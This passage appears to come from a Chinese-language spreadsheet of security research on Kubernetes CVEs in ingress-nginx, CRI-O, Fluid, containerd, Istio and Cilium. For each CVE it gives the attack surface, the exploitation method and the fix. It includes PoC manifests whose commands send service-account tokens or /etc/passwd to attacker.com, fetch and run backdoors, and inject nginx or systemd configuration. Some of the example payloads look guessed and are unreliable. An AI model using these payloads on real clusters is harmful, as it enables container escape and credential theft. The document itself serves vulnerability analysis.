   metadata:
     name: malicious-ingress
     annotations:
       nginx.ingress.kubernetes.io/configuration-snippet: |
         # 恶意命令注入（示例）
         $(curl -X POST --data-binary @/var/run/secrets/kubernetes.io/serviceaccount/token attacker.com)
   spec:
     rules:
     - http:
         paths:
         - path: /
           pathType: Prefix
           backend:
             service:
               name: dummy
               port:
                 number: 80</t>
  </si>
  <si>
    <t>静态+ 动态
触发： 动态</t>
  </si>
  <si>
    <t>验证逻辑不完整</t>
  </si>
  <si>
    <t>ingress</t>
  </si>
  <si>
    <t>生成Nginx配置文件
getConfiguration</t>
  </si>
  <si>
    <t xml:space="preserve">
存在注释说明函数的功能为配置生成
返回值存在明显的配置数据结构
入口点： 满足控制器reconcile 模式
</t>
  </si>
  <si>
    <t xml:space="preserve">
关键操作本身不存在与外部交互，关键操作前后存在与外部交互的函数操作
</t>
  </si>
  <si>
    <t>生成配置后有明显的分发配置的操作或者重置更新的操作:
err := n.OnUpdate(*pcfg) 和 err := n.configureDynamically(pcfg)
更新k9s.io/ingress-nginx/internal/ingress.Configuration
配置分发-&gt; 
http 请求、udp传输
1. 函数调用链中出现 nginx 相关的函数或变量。
分发配置的函数操作有明显的与Nginx-server进行交互的函数特征：
1. 特定的接口 nginx.NewPostStatusRequest
2. 引用特定的端口
nginx.StreamPort
2. 配置数据的转换和序列化，例如使用 json.Marshal 函数。
3. 使用网络连接（例如 HTTP 或 TCP）将配置数据发送到远程服务器。-?&gt; 收集特定的函数接口
4. 配置数据的格式化，例如使用特定的数据结构或字段来表示配置信息。</t>
  </si>
  <si>
    <t>完善校验规则： 完善正则表达式
authVerifyClientRegex = regexp.MustCompile(`on|off|optional|optional_no_ca`)
 authVerifyClientRegex = regexp.MustCompile(`^(on|off|optional|optional_no_ca)$`)</t>
  </si>
  <si>
    <t xml:space="preserve">控制器校验：
1. getBackendServers
2. createUpstreams
getConfiguration-&gt;getBackendServers-&gt;createUpstreams
3. createServers
getConfiguration-&gt;getBackendServers-&gt;createServers
dropSnippetDirectives
准入控制器校验：internal\admission\controller\main.go
func (ia *IngressAdmission) HandleAdmission(obj runtime.Object) (runtime.Object, error)-&gt; CheckIngress
</t>
  </si>
  <si>
    <t xml:space="preserve">强化验证逻辑：完善正则表达式
-&gt; 直接在解析注解的功能模块中设定正则表达式
</t>
  </si>
  <si>
    <t xml:space="preserve">自定义验证函数：
dropSnippetDirectives
CheckIngress
特征：通过识别特定的配置项，定位check点
</t>
  </si>
  <si>
    <t xml:space="preserve">check 后信息输出：
CheckInrgess: return fmt.Errorf("%s annotation cannot be used. Snippet directives are disabled by the Ingress administrator", key)
  }
dropSnippetDirectives: 内部函数有信息输出
</t>
  </si>
  <si>
    <t>CVE-2022-4886</t>
  </si>
  <si>
    <t xml:space="preserve">
Ingress-nginx的`path`清理机制可通过`log_format`指令绕过。</t>
  </si>
  <si>
    <t>**攻击面或影响范围**  
   - 攻击者需有`Ingress`资源写入权限。  
   - 影响使用Ingress-NGINX且允许自定义日志格式的集群。</t>
  </si>
  <si>
    <t>**可能的利用方式**  
   - 通过恶意`log_format`注入未过滤的变量（如`$request_uri`），绕过`path`字段的合法性检查，使NGINX处理非预期路径（如`/../`）。</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
     kind: Ingress
     metadata:
       annotations:
         nginx.ingress.kubernetes.io/log-format: '{"path":"$request_uri"}'  # 恶意log_format绕过路径过滤
     spec:
       rules:
       - http:
           paths:
           - path: /safe-path
             pathType: Prefix
             backend:
               service:
                 name: backend
                 port: 
                   number: 80</t>
  </si>
  <si>
    <t>log_format exploit escape=none $http_x_ginoah;\n
          server {\n
            server_name x.x;\n
            listen 80;\n
            listen [::]:80;\n
            location /z/ {\n
                access_log /tmp/luashell exploit;\n
            }\n
            location /x/ {\n
使用Log_format,access_log还有Include来绕过
.*_by_lua.*
path: "/x/ {\n     # 开始注入 nginx 配置
  }\n
  }\n               # 闭合原有配置块
  log_format exploit escape=none $http_x_ginoah;\n  # 定义日志格式，使用header内容
  server {\n        # 注入新的 server 块
    server_name x.x;\n
    listen 80;\n
    listen [::]:80;\n
    location /z/ {\n
      access_log /tmp/luashell exploit;\n  # 将header写入文件
    }\n
    location /x/ {\n
  #"                # 注释掉后续内容
Ingress 的 path 字段被注入 nginx 配置
通过换行和闭合花括号逃逸出原配置块
注入自定义的 log_format 和 server 配置
利用 access_log 将 HTTP header 内容写入任意文件
进一步的横向移动方式：
1.Find another service account with cluster admin permissions
2.Find another service account with node permissions to patch kubelet config；
3.Find another service account with pod permissions to create/patch a privileged pod, then escape to the control-plane node
https://hackerone.com/reports/1620702#activity-17418760（ 有详细的后续横向移动的攻击过程）</t>
  </si>
  <si>
    <t>代码注释： 存在代码注释，但缺少安全性说明
文档：无具体文档
验证逻辑： 存在验证逻辑
错误信息提示:不存在错误信息
单元测试文件中进行测试：存在功能性测试</t>
  </si>
  <si>
    <t xml:space="preserve">自定义验证函数：
CheckIngress
特征：通过识别特定的配置项，定位check点
</t>
  </si>
  <si>
    <t>CVE-2021-25748</t>
  </si>
  <si>
    <t xml:space="preserve">
在ingress-nginx中发现一个安全漏洞，能够创建或更新Ingress对象的攻击者可通过换行符绕过对Ingress对象（位于`networking.k8s.io`或`extensions` API组）中`spec.rules[].http.paths[].path`字段的清理措施，从而获取ingress-nginx控制器的凭证。在默认配置中，该凭证具有访问集群内所有Secret的权限。</t>
  </si>
  <si>
    <t>**攻击面**：拥有`Ingress`创建/更新权限的用户（RBAC权限不足时）。</t>
  </si>
  <si>
    <t>**利用方式**：  
   - 攻击者构造含换行符的`path`字段，利用ingress-nginx的路径重写逻辑，将请求重定向到内部`/metrics`或`/debug`端点，从而泄露控制器的Bearer Token。</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
     kind: Ingress
     metadata:
       name: malicious-ingress
     spec:
       rules:
       - http:
           paths:
           - path: /legit-path%0d%0aX-Original-URL: /secrets
             pathType: Prefix
             backend:
               service:
                 name: dummy
                 port:
                   number: 80</t>
  </si>
  <si>
    <t>CVE-2023-5043</t>
  </si>
  <si>
    <t xml:space="preserve">
Ingress Nginx注解注入漏洞可导致任意命令执行。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 允许用户创建/修改Ingress资源的集群（尤其是暴露Ingress控制器的集群）。  
   - 攻击者需具备`Ingress`资源写入权限（符合CVSS `PR:L`）。</t>
  </si>
  <si>
    <t>**利用方式**：  
   - 通过`annotations`字段注入恶意Nginx配置片段（如`configuration-snippet`），利用Ingress控制器解析时执行命令。</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
     kind: Ingress
     metadata:
       name: malicious-ingress
       annotations:
         nginx.ingress.kubernetes.io/configuration-snippet: |
           # 恶意命令注入（示例）
           echo '恶意代码' | bash
     spec:
       rules:
       - host: example.com
         http:
           paths:
           - path: /
             pathType: Prefix
             backend:
               service:
                 name: backend-service
                 port: 
                   number: 80</t>
  </si>
  <si>
    <t>CVE-2023-5044（对原有校验的绕过）</t>
  </si>
  <si>
    <t xml:space="preserve">
通过nginx.ingress.kubernetes.io/permanent-redirect注解实现的代码注入漏洞。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**  
- 使用 `ingress-nginx` 控制器的集群  
- 允许用户创建/修改Ingress资源的场景（如多租户集群）</t>
  </si>
  <si>
    <t>**利用方式**  
攻击者通过构造恶意重定向注解注入Nginx配置（如插入`$`变量、转义符或恶意正则），触发控制器生成的Nginx配置解析异常或执行任意操作（如SSRF、路径遍历）。</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
  kind: Ingress
  metadata:
    annotations:
      nginx.ingress.kubernetes.io/permanent-redirect: "https://evil.com$escaped_payload"
  spec:
    rules:
    - host: example.com
      http:
        paths:
        - path: /
          pathType: Prefix
          backend:
            service:
              name: web
              port: 
                number: 80</t>
  </si>
  <si>
    <t>代码注释： 存在代码注释，但缺少安全性说明
文档： 对字段的危险性进行了详细的说明
https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations-risk/ ( 后续补充的）
验证逻辑： 不存在验证逻辑
错误信息提示:不存在错误信息
单元测试文件中进行测试：存在功能性测试</t>
  </si>
  <si>
    <t>CVE-2021-25746（对CVE-2021-25742的绕过）</t>
  </si>
  <si>
    <t xml:space="preserve">
在ingress-nginx中发现一个安全漏洞，能够创建或更新Ingress对象的攻击者可通过在Ingress对象（属于networking.k8s.io或extensions API组）中设置.metadata.annotations注解来获取ingress-nginx控制器的访问凭证。在默认配置中，该凭证拥有访问集群中所有密钥（secrets）的权限。</t>
  </si>
  <si>
    <t>**攻击面**：允许创建/更新`Ingress`对象的用户（如受限RBAC权限的租户）。</t>
  </si>
  <si>
    <t>**利用方式**：攻击者通过`annotations`注入恶意配置（如引用控制器凭据Secret、配置片段泄露敏感数据），控制器加载后暴露集群Secret。</t>
  </si>
  <si>
    <t>对应的注释：nginx.ingress.kubernetes.io/connection-proxy-header
（ingress.Location.Connection）
"a;}：提前关闭引号并使用分号结束当前语句，然后用大括号结束当前代码块
location /fs/ { alias /; autoindex on; }：注入一个新的location块，将/fs/路径映射到服务器根目录，并启用目录列表
location /proxy { set \$a b"：注入另一个location块，设置变量并添加额外的引号以平衡语法</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
     kind: Ingress
     metadata:
       name: malicious-ingress
       annotations:
         nginx.ingress.kubernetes.io/auth-secret: "kube-system/ingress-nginx-controller-token"  # 引用敏感Secret
         nginx.ingress.kubernetes.io/configuration-snippet: |
           more_set_headers "Credentials: $remote_user"  # 通过响应头泄露凭据
     spec:
       ingressClassName: nginx
       rules:
       - host: example.com
         http:
           paths:
           - path: /
             pathType: Prefix
             backend:
               service:
                 name: dummy-service
                 port:
                   number: 80</t>
  </si>
  <si>
    <t>nginx.ingress.kubernetes.io/connection-proxy-header: "a;} location /fs/ { alias /; autoindex on; } location /proxy { set \$a b" 
# 原始配置块
location ... {
    proxy_set_header Connection "a;}    # 开始注入并闭合原块
    # 注入新的location块
    location /fs/ { 
        alias /;           # 指向根目录
        autoindex on;      # 开启目录浏览
    }
    location /proxy { 
        set $a b"         # 闭合引号
}
https://hackerone.com/reports/1378175</t>
  </si>
  <si>
    <t xml:space="preserve">
在 ingress-nginx 中发现一个安全问题，能够创建或更新 Ingress 对象的用户可利用 Ingress 对象（属于 networking.k8s.io 或 extensions API 组）的 spec.rules[].http.paths[].path 字段获取 ingress-nginx 控制器的凭证。在默认配置中，该凭证拥有访问集群中所有 Secret 的权限。</t>
  </si>
  <si>
    <t>**攻击面**：  
   - 任何具有`Ingress`对象创建/更新权限的账户（包括被入侵的ServiceAccount）  
   - 默认影响所有使用ingress-nginx且未修复的集群</t>
  </si>
  <si>
    <t>**利用方式**：  
   - 攻击者构造含特殊正则表达式（如命名捕获组）的`path`字段  
   - ingress-nginx控制器解析路径时，通过日志记录捕获的base64数据  
   - 从日志中提取控制器凭证（含`cluster-admin`级别权限）</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
   kind: Ingress
   metadata:
     name: malicious-ingress
   spec:
     rules:
     - http:
         paths:
         - path: ~^/foo/bar/(?&lt;base64&gt;.*)  # 恶意正则表达式用于捕获凭证
           pathType: ImplementationSpecific
           backend:
             service:
               name: dummy
               port:
                 number: 80</t>
  </si>
  <si>
    <t>代码注释： 存在代码注释，但缺少安全性说明
文档：无具体文档
验证逻辑： 不存在验证逻辑
错误信息提示:不存在错误信息
单元测试文件中进行测试：存在功能性测试</t>
  </si>
  <si>
    <t xml:space="preserve">
在ingress-nginx中发现一个安全问题，具备创建或更新Ingress对象权限的用户可利用自定义片段（custom snippets）功能获取集群中的所有Secret。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**:  
   - 影响允许用户创建/更新Ingress且启用`allow-snippet-annotations`的集群（默认开启）  
   - 攻击者可读取集群所有Secret（包括ServiceAccount令牌）</t>
  </si>
  <si>
    <t>**利用方式**:  
   - 攻击者创建含恶意Nginx片段的Ingress，利用Lua脚本执行命令或直接读取敏感文件（如`/var/run/secrets`下的Secret）  
   - 通过Nginx配置注入实现横向移动或权限提升</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
     kind: Ingress
     metadata:
       name: malicious-ingress
       annotations:
         nginx.ingress.kubernetes.io/configuration-snippet: |
           location ~* "^/exploit" {
             content_by_lua_block {
               os.execute("cat /var/run/secrets/kubernetes.io/serviceaccount/token | nc attacker.com 1234")
             }
           }
     spec:
       ingressClassName: nginx
       rules:
       - host: example.com
         http:
           paths:
           - path: /
             pathType: Prefix
             backend:
               service:
                 name: dummy-service
                 port:
                   number: 80</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1.测试结果多次运行不一致 （存在问题）
2. 识别src type需要自动化指定分析范围，降低误报-&gt; 实现了一半，尚未实现完
</t>
    </r>
    <r>
      <rPr>
        <strike/>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">3. 注释与数据结构字段之间的对应关系的自动化提取没有实现完 -》 需要在配置文件中指定分析入口
-》已实现
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">4.输出结果注释字段变成接口类型，需要对应找特定的字段
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">1.开启 allow-snippet-annottaions
2. 配置中snippet使用的位置有：
[server-snippet]
(https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/#server-snippet)
[configuration-snippet]
(https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/#configuration-snippet)
[auth-snippet]
(https://github.com/kubernetes/ingress-nginx/blob/main/docs/user-guide/nginx-configuration/annotations.md#external-authentication)
[modsecurity-snippet]
(https://github.com/kubernetes/ingress-nginx/blob/main/docs/user-guide/nginx-configuration/annotations.md#modsecurity)
其中对于server-snippet：
  annotations:
    nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"
    nginx.ingress.kubernetes.io/server-snippet: |
      location /security/ {
        autoindex on;
        alias /var/run/secrets/kubernetes.io/serviceaccount/;
      }
攻击模式明显：
创建资源注入恶意payload-&gt; 执行代码（代码可获取应用的token)-&gt; 基于token对应的权限进行横向移动（扫描获取集群的密钥 List secret) </t>
  </si>
  <si>
    <t>信任边界发生变化</t>
  </si>
  <si>
    <t xml:space="preserve">
----
1. 基本类型（string)
nginx.ingress.kubernetes.io/configuration-snippet-&gt;
anns.Ingress.ConfigurationSnippet
赋值位置：
Configuration.[]Server.[]Location,ConfigurationSnippet
2. 结构体字段：Ingress.kubernetes.io/auth-snippet-&gt;
 存在包装在authReq.Config中
对应：
anns.Ingress.ExternalAuth
赋值位置：
Configuration.[]Server.[]Location,.ExternalAuth
3  基本类型（string)
ingress.kubernetes.io/server-snippet-&gt;
anns.Ingress.ServerSnippet
对应的赋值位置：
Configuration.[]Server.ServerSnippet
4. 结构体字段
ingress.kubernetes.io/modsecurity-snippet-&gt;
包装在modSecurity.Config
对应
anns.Ingress.ModSecurity
对应的赋值位置：
Configuration.[]Server.[]Location.ModSecurity
</t>
  </si>
  <si>
    <t>代码注释： 存在代码注释，但缺少安全性说明
注释在目标赋值的左值字段
文档： 对字段的危险性进行了详细的说明
https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations-risk/ ( 后续补充的）
验证逻辑： 不存在验证逻辑
错误信息提示:不存在错误信息
单元测试文件中进行测试：存在功能性测试</t>
  </si>
  <si>
    <t xml:space="preserve">新增配置决定是否启用相关字段
1. ingress-nginx-controller 配置中添加：allow-snippet-annotations："false"
1) Static Deploy Files
Edit the ConfigMap for ingress-nginx after deployment:
kubectl edit configmap -n ingress-nginx ingress-nginx-controller
Add directive:
data:
allow-snippet-annotations: “false”
More in
formation on the ConfigMap here
2) Deploying Via Helm
Set controller.allowSnippetAnnotations to false in the Values.yaml or add the directive to the helm deploy:
helm install [RELEASE_NAME] --set controller.allowSnippetAnnotations=false ingress-nginx/ingress-nginx
https://github.com/kubernetes/ingress-nginx/blob/controller-v1.0.1/charts/ingress-nginx/values.yaml#L76
</t>
  </si>
  <si>
    <t xml:space="preserve">验证逻辑增加：
添加配置选项，选择性启用
</t>
  </si>
  <si>
    <t xml:space="preserve">
Istio 是一个用于连接、管理和保护微服务的开放平台。在 1.12.0 和 1.12.1 版本中，Istio 存在权限提升攻击漏洞。拥有对 `gateways.gateway.networking.k8s.io` 对象 `CREATE` 权限的用户可将此权限升级以创建其本无访问权限的其他资源（例如 `Pod`）。该漏洞仅影响处于 Alpha 阶段的 Kubernetes Gateway API 功能，与未受影响的 Istio Gateway 类型（gateways.networking.istio.io）无关。建议用户升级至修复版本，若无法升级可采取以下任一措施消除风险：移除 gateways.gateway.networking.k8s.io 的 CustomResourceDefinition、在 Istiod 中设置环境变量 PILOT_ENABLE_GATEWAY_API_DEPLOYMENT_CONTROLLER=true，或从未受信任用户处撤销对 gateways.gateway.networking.k8s.io 对象的 CREATE 权限。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 攻击面：拥有`gateways.gateway.networking.k8s.io` CREATE权限的用户。  
   - 影响范围：启用Gateway API Alpha功能的Istio集群（1.12.0-1.12.1）。</t>
  </si>
  <si>
    <t>**攻击方式与过程**：  
   - 攻击者创建Gateway对象 → Istiod控制器（以高权限ServiceAccount运行）解析对象并创建关联资源（如Pod）→ 越权执行代码。</t>
  </si>
  <si>
    <t>apiVersion: gateway.networking.k8s.io/v1alpha2
     kind: Gateway
     metadata:
       name: malicious-gateway
     spec:
       gatewayClassName: istio
       listeners:
       - hostname: "*.example.com"
         port: 80
         protocol: HTTP
         # 依赖Istiod控制器逻辑，可能触发非预期的Pod创建</t>
  </si>
  <si>
    <t>1.12.2
https://github.com/istio/istio/pull/36197/commits/2aa1cbe02c968483f7aa5a32c6f0c0efe484c425</t>
  </si>
  <si>
    <t>校验责任发生变化-k8s安全策略忽略</t>
  </si>
  <si>
    <t>CVE-2024-3154</t>
  </si>
  <si>
    <t xml:space="preserve">
在cri-o中发现一个安全缺陷，该漏洞允许通过Pod注解注入任意systemd属性。任何能够创建带有任意注解的Pod的用户，都可以借此在主机系统上执行任意操作。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 攻击者需具备Pod创建权限（如绑定到高风险Role/ClusterRole的用户）  
   - 所有使用cri-o运行时且未限制Pod注解的集群</t>
  </si>
  <si>
    <t>**利用方式**：  
   - 通过恶意Pod注解注入systemd属性（如`ExecStart`），绕过容器隔离机制  
   - 触发cri-o解析注解时执行宿主机的systemd单元配置</t>
  </si>
  <si>
    <t>pod.annotations:
org.systemd.property.*
攻击示例：
---
apiVersion: v1
kind: Pod
metadata:
  name: poc-arbitrary-systemd-property-injection
  annotations:
    # I believe that ExecStart with an arbitrary command works here too,
    # but I haven't figured out how to marshalize the ExecStart struct to gvariant string.
    org.systemd.property.SuccessAction: "'poweroff-force'"
spec:
  containers:
    - name: hello
      image: [quay.io/podman/hello](http://quay.io/podman/hello)</t>
  </si>
  <si>
    <t>apiVersion: v1
     kind: Pod
     metadata:
       name: malicious-pod
       annotations:
         # 恶意systemd属性注入示例（字段名根据cri-o实现细节可能变化）
         cni.projectcalico.org/systemd_property_net: "ExecStart=/bin/sh -c '恶意命令'"
     spec:
       containers:
       - name: alpine
         image: alpine</t>
  </si>
  <si>
    <t>攻击载荷：
apiVersion: v1
kind: Pod
metadata:
  name: systemd-inject-pod
  annotations:
    # 注入危险的systemd属性
    org.systemd.property.SuccessAction: "'poweroff-force'"  # 强制关机
    # 或其他危险属性
    # org.systemd.property.ExecStart: "'/malicious/command'"
spec:
  containers:
  - name: attack-container
    image: quay.io/podman/hello
攻击向量示例：
# 1. 系统关机
org.systemd.property.SuccessAction: "'poweroff-force'"
# 2. 执行命令
org.systemd.property.ExecStart: "'/bin/evil_command'"
# 3. 修改系统配置
org.systemd.property.Environment: "'MALICIOUS_CONFIG=value'"
攻击流程：
1. 部署恶意Pod：
kubectl apply -f malicious-pod.yaml
2. CRI-O处理过程：
Pod注解 -&gt; OCI注解 -&gt; systemd属性
3. systemd执行：
- 接收注入的属性
- 执行对应系统操作</t>
  </si>
  <si>
    <t>信任边界发生变化-本地应用向云迁移</t>
  </si>
  <si>
    <t xml:space="preserve">
CRI-O中发现一个漏洞，可导致任何有权访问Kube API的攻击者耗尽节点内存或磁盘空间。ExecSync请求会在容器中执行命令并记录命令输出。命令执行后，CRI-O会以读取整个文件内容的方式读取该输出文件。因此，当命令输出量较大时，CRI-O在读取命令输出期间可能耗尽节点的内存或磁盘空间。此漏洞最高级别的威胁在于影响系统可用性。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 所有使用CRI-O运行时且未限制Exec权限的Kubernetes节点。  
   - 攻击者需具备Pod Exec权限（RBAC配置不当或过度授权）。</t>
  </si>
  <si>
    <t>**利用方式**：  
   - 通过合法/非法的Pod Exec接口执行输出大量数据的命令（如生成GB级日志）。  
   - CRI-O将命令输出全量读取到内存/磁盘，导致节点OOM或存储耗尽。</t>
  </si>
  <si>
    <t>apiVersion: v1
   kind: Pod
   metadata:
     name: vulnerable-pod
   spec:
     containers:
     - name: alpine
       image: alpine
       command: ["sleep", "infinity"]</t>
  </si>
  <si>
    <t xml:space="preserve">
CRI-O 中存在一个设置 Pod 内核参数的方式缺陷。该漏洞允许任何有权在采用 CRI-O 运行时的 Kubernetes 集群上部署 Pod 的攻击者实现容器逃逸，并在部署恶意 Pod 的集群节点上以 root 权限执行任意代码。</t>
  </si>
  <si>
    <t>**攻击面**：所有使用CRI-O运行时且允许创建Pod的集群（RBAC权限控制失效场景）</t>
  </si>
  <si>
    <t>**利用方式**：攻击者部署包含恶意内核参数配置的Pod，利用CRI-O解析漏洞覆盖节点级配置，触发容器逃逸。</t>
  </si>
  <si>
    <t>Pod.spec.SecurityContext.sysctls
---
攻击向量示例：
cat ./sysctl-set.yaml
apiVersion: v1
kind: Pod
metadata:
  name: sysctl-set
spec:
  securityContext:
   sysctls:
   - name: kernel.shm_rmid_forced
     value: "1+kernel.core_pattern=|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #"
  containers:
  - name: alpine
    image: alpine:latest
    command: ["tail", "-f", "/dev/null"]</t>
  </si>
  <si>
    <t>apiVersion: v1
   kind: Pod
   metadata:
     annotations:
       io.kubernetes.cri-o.Devices: "malicious/path"
   spec:
     containers:
     - name: exploit
       image: alpine
       securityContext:
         privileged: true  # 辅助提权</t>
  </si>
  <si>
    <t>复杂来源-资源抽象转换校验一致性校验</t>
  </si>
  <si>
    <t xml:space="preserve">
Fluid 是一款面向数据密集型应用的开源 Kubernetes 原生分布式数据集协调器与加速器。Fluid 项目 JuicefsRuntime 中存在操作系统命令注入漏洞，已认证且具有创建或更新 K8s CRD Dataset/JuicefsRuntime 权限的用户可在 juicefs 相关容器中执行任意操作系统命令，可能导致数据遭未授权访问、篡改或删除。使用 JuicefsRuntime 且版本低于 0.9.3 的用户应升级至 v0.9.3 版本。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 攻击者需具备`CREATE/UPDATE`权限操作CRD资源  
   - 影响使用JuicefsRuntime且版本&lt;0.9.3的Fluid用户</t>
  </si>
  <si>
    <t>**攻击方式**：  
   - 通过`kubectl apply`提交恶意JuicefsRuntime配置  
   - Fluid控制器解析CRD时拼接未过滤参数到shell命令（如`juicefs mount`命令）</t>
  </si>
  <si>
    <t>Dataset 或者 JuicefsRuntime
====================
apiVersion: data.fluid.io/v1alpha1
kind: Dataset
metadata:
  name: malicious-dataset
spec:
  mounts:
    # mount.name 是一个命令注入点
    - name: "juicefs-test; id &gt; /tmp/pwned #"
      mountPoint: "juicefs://sample"
---
apiVersion: data.fluid.io/v1alpha1
kind: JuicefsRuntime
metadata:
  name: malicious-juicefs-runtime
spec:
  replicas: 1
  juicefs:
    # 配置一个可工作的JuiceFS实例，但在多个点注入命令
    # 配置注入点
    configs:
      # storage参数的命令注入
      storage: "s3; curl http://attacker.com/stolen-data?data=$(cat /etc/passwd | base64) #"
      # bucket参数的命令注入
      bucket: "my-bucket; wget -O /tmp/backdoor http://attacker.com/backdoor &amp;&amp; chmod +x /tmp/backdoor &amp;&amp; /tmp/backdoor #"
      # 格式化选项中的命令注入
      formatOptions:
        - "local-port=9999; echo 'net is evil' &gt; /tmp/net #"
    # 挂载点注入
    fuse:
      # mountPath参数的命令注入
      mountPath: "/runtime-mnt; touch /tmp/i-was-here #"
      # 子路径命令注入
      subPath: "/subpath; ls -la / &gt; /tmp/ls-output #"
      # 挂载选项命令注入
      options:
        - "attr-cache=1; cat /proc/self/environ &gt; /tmp/env #"
    # worker挂载点注入
    worker:
      mountPath: "/worker-mnt; ps aux &gt; /tmp/processes #"
      options:
        - "cache-size=1024; find /var/run -type s &gt; /tmp/sockets #"
  # 其他必要的配置
  tieredstore:
    levels:
      - mediumtype: MEM
        path: /dev/shm
        quota: 150Mi
        high: "0.95"
        low: "0.7"</t>
  </si>
  <si>
    <t>apiVersion: data.fluid.io/v1alpha1
   kind: JuicefsRuntime
   metadata:
     name: malicious-runtime
   spec:
     options:
     - "valid_param; curl http://attacker.com/exploit.sh | sh"  # 注入恶意命令</t>
  </si>
  <si>
    <t>OS command injection vulnerability within the Fluid project's JuicefsRuntime can potentially allow an authenticated user, who has the authority to create or update the K8s CRD Dataset/JuicefsRuntime, to execute arbitrary OS commands within the juicefs related containers. This could lead to unauthorized access, modification or deletion of data.</t>
  </si>
  <si>
    <t xml:space="preserve">
containerd是一款开源容器运行时。在containerd的CRI实现中发现一个缺陷：当调用`ExecSync` API时，容器内的程序可能导致containerd守护进程无限制消耗内存。这将致使containerd耗尽主机所有可用内存，导致其他合法工作负载无法获得服务。Kubernetes和crictl均可配置使用containerd的CRI实现；`ExecSync`可能在运行探针或通过"exec"工具执行进程时被调用。该漏洞已在containerd 1.6.6和1.5.13版本中修复，建议用户升级至这些版本以解决问题。无法立即升级的用户应确保仅使用受信任的镜像和命令。</t>
  </si>
  <si>
    <t>**攻击面**:  
   - 使用containerd且未限制exec权限的集群  
   - 允许部署含exec类型探针的Pod（需Pod创建权限）</t>
  </si>
  <si>
    <t>**利用方式**:  
   - 攻击者部署含恶意exec探针或exec操作的Pod，触发containerd持续分配内存  
   - 通过`kubectl exec`执行高内存消耗命令（需exec权限）</t>
  </si>
  <si>
    <t>apiVersion: v1
   kind: Pod
   metadata:
     name: malicious-probe
   spec:
     containers:
     - name: busybox
       image: busybox
       command: ["/bin/sh"]
       args: ["-c", "while true; do sleep 30; done"]
       livenessProbe:
         exec:
           command:
           - /bin/sh
           - -c
           - "while :; do dd if=/dev/zero bs=1M; done"  # 生成无限输出的恶意命令
         initialDelaySeconds: 5
         periodSeconds: 5</t>
  </si>
  <si>
    <t>复杂的来源</t>
  </si>
  <si>
    <t xml:space="preserve">
Cilium是一款基于eBPF数据平面的网络、可观测性与安全解决方案。具备Pod标签更新能力的攻击者可导致Cilium应用错误的网络策略。该漏洞源于Pod更新时，Cilium错误地采用用户提供的Pod标签来选择适用于对应工作负载的策略。此问题会影响以下策略类型：使用namespace、服务账户或集群结构体进行流量限制的Cilium网络策略；采用Cilium命名空间标签选择Pod的集群级Cilium网络策略；以及Kubernetes网络策略。攻击者可提供不存在的结构体名称，从而绕过所有适用于该结构体的网络策略。例如，若为Pod的`io.kubernetes.pod.namespace`标签指定不存在的命名空间，将导致所有命名空间级的CiliumNetworkPolicies均不适用于该Pod。根据Cilium威胁模型描述，此攻击需攻击者具备Kubernetes API Server访问权限。该漏洞已在以下版本修复：Cilium 1.14.2、1.13.7及1.12.14，建议用户升级。临时缓解方案可通过准入控制Webhook阻止对`k8s:io.kubernetes.pod.namespace`和`io.cilium.k8s.policy.*`键值的Pod标签更新。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 攻击面：拥有Pod标签更新权限的用户（通过Kubernetes API Server）  
   - 影响：绕过Cilium网络策略（包括CiliumNetworkPolicy、Kubernetes NetworkPolicy）的流量控制</t>
  </si>
  <si>
    <t>**攻击方式**：  
   - 攻击者通过修改Pod标签，注入伪造的namespace/serviceaccount/cluster信息，使Cilium错误匹配策略或跳过策略应用。</t>
  </si>
  <si>
    <t xml:space="preserve"> user-provided pod labels 
Key为：`k8s:io.kubernetes.pod.namespace` and `io.cilium.k8s.policy.*
修复代码列出了4个需要sanitizered 的label:
k8sconst.PodNamespaceMetaLabels:    {},
  k8sconst.PolicyLabelServiceAccount: {},
  k8sconst.PolicyLabelCluster:        {},
  k8sconst.PodNamespaceLabel:         {},</t>
  </si>
  <si>
    <t>apiVersion: v1
     kind: Pod
     metadata:
       name: malicious-pod
       labels:
         k8s:io.kubernetes.pod.namespace: "fake-ns"  # 伪造不存在的namespace
         io.cilium.k8s.policy.serviceaccount: "fake-sa"  # 伪造服务账号
     spec:
       containers:
       - name: nginx
         image: nginx</t>
  </si>
  <si>
    <t xml:space="preserve">An attacker with the ability to update pod labels can cause Cilium to apply incorrect network policies. This issue arises due to the fact that on pod update, Cilium incorrectly uses user-provided pod labels to select the policies which apply to the workload in question
Kubernetes users may update Pod labels to bypass network policy
</t>
  </si>
  <si>
    <t>校验责任发生变化-资源引用关系</t>
  </si>
  <si>
    <t xml:space="preserve">
